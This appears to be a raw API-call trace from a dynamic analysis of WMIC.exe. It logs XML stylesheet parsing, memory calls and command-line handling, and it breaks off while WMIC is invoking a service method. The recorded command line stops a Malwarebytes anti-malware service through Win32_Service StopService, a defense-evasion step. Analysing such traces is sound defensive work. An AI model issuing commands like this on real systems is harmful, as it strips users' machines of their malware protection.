returned 0x16 [0258.312] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0258.313] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0258.313] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0258.313] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0258.313] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0258.313] malloc (_Size=0x30) returned 0x408400 [0258.313] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.313] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.313] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.313] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=15, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.313] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="htable.xsl") returned 0x0 [0258.313] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.313] malloc (_Size=0x18) returned 0x40c8e0 [0258.313] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.313] free (_Block=0x40c8e0) [0258.313] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0 [0258.313] malloc (_Size=0x18) returned 0x40c8e0 [0258.313] malloc (_Size=0x18) returned 0x40c900 [0258.313] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0258.313] SysStringLen (param_1="TABLE") returned 0x5 [0258.314] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0258.314] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0258.314] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0258.314] SysStringLen (param_1="XML") returned 0x3 [0258.314] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0258.314] SysStringLen (param_1="texttablewsys") returned 0xd [0258.314] SysStringLen (param_1="XML") returned 0x3 [0258.314] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0258.314] malloc (_Size=0x30) returned 0x408440 [0258.314] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.314] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.314] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.314] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=16, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.314] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="htable.xsl") returned 0x0 [0258.314] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.314] malloc (_Size=0x18) returned 0x40c920 [0258.314] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.314] free (_Block=0x40c920) [0258.314] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0 [0258.314] malloc (_Size=0x18) returned 0x40c920 [0258.314] malloc (_Size=0x18) returned 0x40c940 [0258.315] SysStringLen (param_1="htable-sortby") returned 0xd [0258.315] SysStringLen (param_1="TABLE") returned 0x5 [0258.315] SysStringLen (param_1="htable-sortby") returned 0xd [0258.315] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0258.315] SysStringLen (param_1="htable-sortby") returned 0xd [0258.315] SysStringLen (param_1="XML") returned 0x3 [0258.315] SysStringLen (param_1="htable-sortby") returned 0xd [0258.315] SysStringLen (param_1="texttablewsys") returned 0xd [0258.315] SysStringLen (param_1="htable-sortby") returned 0xd [0258.315] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0258.315] SysStringLen (param_1="XML") returned 0x3 [0258.315] SysStringLen (param_1="htable-sortby") returned 0xd [0258.315] malloc (_Size=0x30) returned 0x408480 [0258.315] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.315] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.315] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.315] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=17, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.315] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="mof.xsl") returned 0x0 [0258.315] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.315] malloc (_Size=0x18) returned 0x40c960 [0258.315] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.316] free (_Block=0x40c960) [0258.316] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0 [0258.316] malloc (_Size=0x18) returned 0x40c960 [0258.316] malloc (_Size=0x18) returned 0x40c980 [0258.316] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0258.316] SysStringLen (param_1="TABLE") returned 0x5 [0258.316] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0258.316] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0258.316] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0258.316] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0258.316] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0258.316] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0258.316] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0258.316] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0258.316] malloc (_Size=0x30) returned 0x4084c0 [0258.316] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.316] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.316] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.316] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=18, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.317] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="mof.xsl") returned 0x0 [0258.317] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.317] malloc (_Size=0x18) returned 0x40c9a0 [0258.317] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.317] free (_Block=0x40c9a0) [0258.317] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0 [0258.317] malloc (_Size=0x18) returned 0x40c9a0 [0258.317] malloc (_Size=0x18) returned 0x40c9c0 [0258.317] SysStringLen (param_1="wmiclimofformat") returned 0xf [0258.317] SysStringLen (param_1="TABLE") returned 0x5 [0258.317] SysStringLen (param_1="wmiclimofformat") returned 0xf [0258.317] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0258.317] SysStringLen (param_1="wmiclimofformat") returned 0xf [0258.317] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0258.317] SysStringLen (param_1="wmiclimofformat") returned 0xf [0258.317] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0258.317] SysStringLen (param_1="wmiclimofformat") returned 0xf [0258.318] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0258.318] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0258.318] SysStringLen (param_1="wmiclimofformat") returned 0xf [0258.318] malloc (_Size=0x30) returned 0x408500 [0258.318] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.318] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.318] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.318] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=19, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.318] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="textvaluelist.xsl") returned 0x0 [0258.318] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.318] malloc (_Size=0x18) returned 0x40c9e0 [0258.318] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.318] free (_Block=0x40c9e0) [0258.318] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0 [0258.318] malloc (_Size=0x18) returned 0x40c9e0 [0258.318] malloc (_Size=0x18) returned 0x40ca00 [0258.319] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0258.319] SysStringLen (param_1="TABLE") returned 0x5 [0258.319] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0258.319] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0258.319] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0258.319] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0258.319] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0258.319] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0258.319] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0258.319] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0258.319] malloc (_Size=0x30) returned 0x408540 [0258.320] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.320] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.320] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.320] IXMLDOMNodeList:get_item (in: This=0x1cd9cc0, index=20, listItem=0x12f910 | out: listItem=0x12f910*=0x1cdbd50) returned 0x0 [0258.320] IXMLDOMNode:get_text (in: This=0x1cdbd50, text=0x12f920 | out: text=0x12f920*="textvaluelist.xsl") returned 0x0 [0258.320] IXMLDOMNode:get_attributes (in: This=0x1cdbd50, attributeMap=0x12f918 | out: attributeMap=0x12f918*=0x1cd78d0) returned 0x0 [0258.320] malloc (_Size=0x18) returned 0x40ca20 [0258.320] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cd78d0, name="KEYWORD", namedItem=0x12f928 | out: namedItem=0x12f928*=0x1cda280) returned 0x0 [0258.320] free (_Block=0x40ca20) [0258.320] IXMLDOMNode:get_nodeValue (in: This=0x1cda280, value=0x12f960 | out: value=0x12f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0 [0258.320] malloc (_Size=0x18) returned 0x40ca20 [0258.320] malloc (_Size=0x18) returned 0x40ca40 [0258.320] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0258.320] SysStringLen (param_1="TABLE") returned 0x5 [0258.320] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0258.320] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0258.320] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0258.320] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0258.320] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0258.321] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0258.321] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0258.321] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0258.321] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0258.321] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0258.321] malloc (_Size=0x30) returned 0x408580 [0258.321] IUnknown:Release (This=0x1cdbd50) returned 0x0 [0258.321] IUnknown:Release (This=0x1cd78d0) returned 0x0 [0258.321] IUnknown:Release (This=0x1cda280) returned 0x0 [0258.321] IUnknown:Release (This=0x1cd9cc0) returned 0x0 [0258.321] FreeThreadedDOMDocument:IUnknown:Release (This=0x1cdbc50) returned 0x1 [0258.321] FreeThreadedDOMDocument:IUnknown:Release (This=0x1cd71d0) returned 0x0 [0258.321] free (_Block=0x406f70) [0258.321] GetCommandLineW () returned="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice" [0258.321] malloc (_Size=0xe0) returned 0x40cd30 [0258.321] memcpy_s (in: _Destination=0x40cd30, _DestinationSize=0xde, _Source=0x2225ee, _SourceSize=0xd8 | out: _Destination=0x40cd30) returned 0x0 [0258.321] malloc (_Size=0x18) returned 0x40ca60 [0258.321] malloc (_Size=0x18) returned 0x40ca80 [0258.322] malloc (_Size=0x18) returned 0x40caa0 [0258.322] malloc (_Size=0x18) returned 0x40cac0 [0258.322] malloc (_Size=0x80) returned 0x406f70 [0258.322] GetLocalTime (in: lpSystemTime=0x12fad0 | out: lpSystemTime=0x12fad0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x2, wDay=0x1c, wHour=0x14, wMinute=0x2a, wSecond=0x10, wMilliseconds=0x1ed)) [0258.322] _vsnwprintf (in: _Buffer=0x406f70, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x12fa28 | out: _Buffer="04-28-2020T20:42:16") returned 19 [0258.322] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 73 [0258.322] malloc (_Size=0x94) returned 0x40ce20 [0258.322] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 73 [0258.322] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 73 [0258.322] malloc (_Size=0x94) returned 0x40cec0 [0258.322] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 73 [0258.322] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 73 [0258.322] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 73 [0258.322] malloc (_Size=0xa) returned 0x40cae0 [0258.322] lstrlenW (lpString="path") returned 4 [0258.322] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0258.322] malloc (_Size=0xa) returned 0x40cb00 [0258.322] malloc (_Size=0x8) returned 0x407000 [0258.322] free (_Block=0x0) [0258.322] free (_Block=0x40cae0) [0258.322] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 73 [0258.322] malloc (_Size=0x1c) returned 0x40cf60 [0258.322] lstrlenW (lpString="Win32_Service") returned 13 [0258.322] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0258.322] malloc (_Size=0x1c) returned 0x40cf90 [0258.322] malloc (_Size=0x10) returned 0x40cae0 [0258.323] memmove_s (in: _Destination=0x40cae0, _DestinationSize=0x8, _Source=0x407000, _SourceSize=0x8 | out: _Destination=0x40cae0) returned 0x0 [0258.323] free (_Block=0x407000) [0258.323] free (_Block=0x0) [0258.323] free (_Block=0x40cf60) [0258.323] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 73 [0258.323] malloc (_Size=0xc) returned 0x40cb20 [0258.323] lstrlenW (lpString="where") returned 5 [0258.323] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0258.323] malloc (_Size=0xc) returned 0x40cb40 [0258.323] malloc (_Size=0x18) returned 0x40cb60 [0258.323] memmove_s (in: _Destination=0x40cb60, _DestinationSize=0x10, _Source=0x40cae0, _SourceSize=0x10 | out: _Destination=0x40cb60) returned 0x0 [0258.323] free (_Block=0x40cae0) [0258.323] free (_Block=0x0) [0258.323] free (_Block=0x40cb20) [0258.323] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 73 [0258.323] malloc (_Size=0x3c) returned 0x40cfc0 [0258.323] lstrlenW (lpString="\"name like '%%MBAMService%%'\"") returned 29 [0258.323] _wcsicmp (_String1="\"name like '%%MBAMService%%'\"", _String2="\"NULL\"") returned -20 [0258.323] lstrlenW (lpString="\"name like '%%MBAMService%%'\"") returned 29 [0258.323] lstrlenW (lpString="\"name like '%%MBAMService%%'\"") returned 29 [0258.323] malloc (_Size=0x3c) returned 0x40d010 [0258.323] malloc (_Size=0x20) returned 0x40cf60 [0258.323] memmove_s (in: _Destination=0x40cf60, _DestinationSize=0x18, _Source=0x40cb60, _SourceSize=0x18 | out: _Destination=0x40cf60) returned 0x0 [0258.323] free (_Block=0x40cb60) [0258.323] free (_Block=0x0) [0258.323] free (_Block=0x40cfc0) [0258.323] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 73 [0258.323] malloc (_Size=0xa) returned 0x40cb60 [0258.323] lstrlenW (lpString="call") returned 4 [0258.323] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0258.324] malloc (_Size=0xa) returned 0x40cb20 [0258.324] malloc (_Size=0x30) returned 0x4085c0 [0258.324] memmove_s (in: _Destination=0x4085c0, _DestinationSize=0x20, _Source=0x40cf60, _SourceSize=0x20 | out: _Destination=0x4085c0) returned 0x0 [0258.324] free (_Block=0x40cf60) [0258.324] free (_Block=0x0) [0258.324] free (_Block=0x40cb60) [0258.324] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 73 [0258.324] malloc (_Size=0x18) returned 0x40cb60 [0258.324] lstrlenW (lpString="stopservice") returned 11 [0258.324] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0258.324] malloc (_Size=0x18) returned 0x40cae0 [0258.324] free (_Block=0x0) [0258.324] free (_Block=0x40cb60) [0258.324] malloc (_Size=0x30) returned 0x408600 [0258.324] lstrlenW (lpString="QUIT") returned 4 [0258.324] lstrlenW (lpString="path") returned 4 [0258.324] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0258.325] lstrlenW (lpString="EXIT") returned 4 [0258.325] lstrlenW (lpString="path") returned 4 [0258.325] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0258.325] free (_Block=0x408600) [0258.325] WbemLocator:IUnknown:AddRef (This=0x1fd1390) returned 0x2 [0258.325] malloc (_Size=0x30) returned 0x408600 [0258.325] lstrlenW (lpString="/") returned 1 [0258.325] lstrlenW (lpString="path") returned 4 [0258.325] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0258.325] lstrlenW (lpString="-") returned 1 [0258.325] lstrlenW (lpString="path") returned 4 [0258.325] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0258.325] lstrlenW (lpString="CLASS") returned 5 [0258.325] lstrlenW (lpString="path") returned 4 [0258.325] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0258.325] lstrlenW (lpString="PATH") returned 4 [0258.325] lstrlenW (lpString="path") returned 4 [0258.325] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0258.325] lstrlenW (lpString="/") returned 1 [0258.325] lstrlenW (lpString="Win32_Service") returned 13 [0258.325] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0258.325] lstrlenW (lpString="-") returned 1 [0258.325] lstrlenW (lpString="Win32_Service") returned 13 [0258.325] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0258.326] lstrlenW (lpString="Win32_Service") returned 13 [0258.326] malloc (_Size=0x1c) returned 0x40cf60 [0258.326] lstrlenW (lpString="Win32_Service") returned 13 [0258.326] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xfff | out: _String="Win32_Service", _Context=0xfff) returned="Win32_Service" [0258.326] lstrlenW (lpString="Win32_Service") returned 13 [0258.326] malloc (_Size=0x1c) returned 0x40cfc0 [0258.326] lstrlenW (lpString="Win32_Service") returned 13 [0258.326] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xffffffffffd20970 | out: _String=0x0, _Context=0xffffffffffd20970) returned 0x0 [0258.326] lstrlenW (lpString="") returned 0 [0258.326] lstrlenW (lpString="WHERE") returned 5 [0258.326] lstrlenW (lpString="where") returned 5 [0258.326] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0258.326] lstrlenW (lpString="/") returned 1 [0258.326] lstrlenW (lpString="name like '%%MBAMService%%'") returned 27 [0258.326] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%MBAMService%%'", cchCount1=27, lpString2="/", cchCount2=1) returned 3 [0258.326] lstrlenW (lpString="-") returned 1 [0258.326] lstrlenW (lpString="name like '%%MBAMService%%'") returned 27 [0258.326] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%MBAMService%%'", cchCount1=27, lpString2="-", cchCount2=1) returned 3 [0258.326] lstrlenW (lpString="name like '%%MBAMService%%'") returned 27 [0258.326] malloc (_Size=0x38) returned 0x408640 [0258.326] lstrlenW (lpString="name like '%%MBAMService%%'") returned 27 [0258.326] lstrlenW (lpString="/") returned 1 [0258.326] lstrlenW (lpString="call") returned 4 [0258.326] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0258.326] lstrlenW (lpString="-") returned 1 [0258.326] lstrlenW (lpString="call") returned 4 [0258.326] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0258.327] lstrlenW (lpString="call") returned 4 [0258.327] malloc (_Size=0xa) returned 0x40cb60 [0258.327] lstrlenW (lpString="call") returned 4 [0258.327] lstrlenW (lpString="GET") returned 3 [0258.327] lstrlenW (lpString="call") returned 4 [0258.327] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0258.327] lstrlenW (lpString="LIST") returned 4 [0258.327] lstrlenW (lpString="call") returned 4 [0258.327] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0258.327] lstrlenW (lpString="SET") returned 3 [0258.327] lstrlenW (lpString="call") returned 4 [0258.327] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0258.327] lstrlenW (lpString="CREATE") returned 6 [0258.327] lstrlenW (lpString="call") returned 4 [0258.327] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0258.327] lstrlenW (lpString="CALL") returned 4 [0258.327] lstrlenW (lpString="call") returned 4 [0258.327] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0258.327] lstrlenW (lpString="/") returned 1 [0258.327] lstrlenW (lpString="stopservice") returned 11 [0258.327] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0258.327] lstrlenW (lpString="-") returned 1 [0258.327] lstrlenW (lpString="stopservice") returned 11 [0258.327] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0258.327] lstrlenW (lpString="stopservice") returned 11 [0258.327] malloc (_Size=0x18) returned 0x40cb80 [0258.328] lstrlenW (lpString="stopservice") returned 11 [0258.328] ??0CHString@@QEAA@XZ () returned 0x12d678 [0258.328] GetCurrentThreadId () returned 0xbbc [0258.328] GetCurrentThreadId () returned 0xbbc [0258.328] ??0CHString@@QEAA@XZ () returned 0x12d448 [0258.328] malloc (_Size=0x8) returned 0x40cff0 [0258.328] malloc (_Size=0x18) returned 0x40cba0 [0258.328] malloc (_Size=0x18) returned 0x40cbc0 [0258.328] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1fd1390, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff992950 | out: ppNamespace=0xff992950*=0x1fe3a98) returned 0x0 [0258.355] free (_Block=0x40cbc0) [0258.355] CoSetProxyBlanket (pProxy=0x1fe3a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0258.356] free (_Block=0x40cff0) [0258.356] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0258.356] free (_Block=0x40cba0) [0258.356] malloc (_Size=0x18) returned 0x40cba0 [0258.356] IWbemServices:GetObject (in: This=0x1fe3a98, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x12d658*=0x0, ppCallResult=0x0 | out: ppObject=0x12d658*=0x200bfa0, ppCallResult=0x0) returned 0x0 [0258.438] free (_Block=0x40cba0) [0258.438] IWbemClassObject:BeginMethodEnumeration (This=0x200bfa0, lEnumFlags=0) returned 0x0 [0258.438] IWbemClassObject:NextMethod (in: This=0x200bfa0, lFlags=0, pstrName=0x12d638*=0x0, ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x0 | out: pstrName=0x12d638*="StartService", ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x200c4a0) returned 0x0 [0258.439] lstrlenW (lpString="StartService") returned 12 [0258.439] lstrlenW (lpString="stopservice") returned 11 [0258.439] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0258.439] IUnknown:Release (This=0x200c4a0) returned 0x0 [0258.439] IWbemClassObject:NextMethod (in: This=0x200bfa0, lFlags=0, pstrName=0x12d638*=0x0, ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x0 | out: pstrName=0x12d638*="StopService", ppInSignature=0x12d640*=0x0, ppOutSignature=0x12d648*=0x200c4a0) returned 0x0 [0258.439] lstrlenW (lpString="StopService") returned 11 [0258.439] lstrlenW (lpString="stopservice") returned 11 [0258.439] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0258.439] malloc (_Size=0x70) returned 0x40d060 [0258.439] ??0CHString@@QEAA@XZ () returned 0x12d008 [0258.439] GetCurrentThreadId () returned 0xbbc [0258.439] IWbemClassObject:GetNames (in: This=0x200c4a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x12d000 | out: pNames=0x12d000*="\x01ƀ\x08") returned 0x0 [0258.439] SafeArrayGetLBound (in: psa=0x2c4ae0, nDim=0x1, plLbound=0x12d018 | out: plLbound=0x12d018) returned 0x0 [0258.439] SafeArrayGetUBound (in: psa=0x2c4ae0, nDim=0x1, plUbound=0x12d014 | out: plUbound=0x12d014) returned 0x0 [0258.440] SafeArrayGetElement (in: psa=0x2c4ae0, rgIndices=0x12cff4, pv=0x12cff8 | out: pv=0x12cff8) returned 0x0 [0258.440] malloc (_Size=0x48) returned 0x40d0e0 [0258.440] IWbemClassObject:GetPropertyQualifierSet (in: This=0x200c4a0, wszProperty="ReturnValue", ppQualSet=0x12ce48 | out: ppQualSet=0x12ce48*=0x1fd13b0) returned 0x0 [0258.440] malloc (_Size=0x18) returned 0x40cba0 [0258.440] IWbemQualifierSet:Get (in: This=0x1fd13b0, wszName="CIMTYPE", lFlags=0, pVal=0x12ced0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x1), plFlavor=0x0 | out: pVal=0x12ced0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x1), plFlavor=0x0) returned 0x0 [0258.440] free (_Block=0x40cba0) [0258.440] malloc (_Size=0x18) returned 0x40cba0 [0258.440] IWbemClassObject:Get (in: 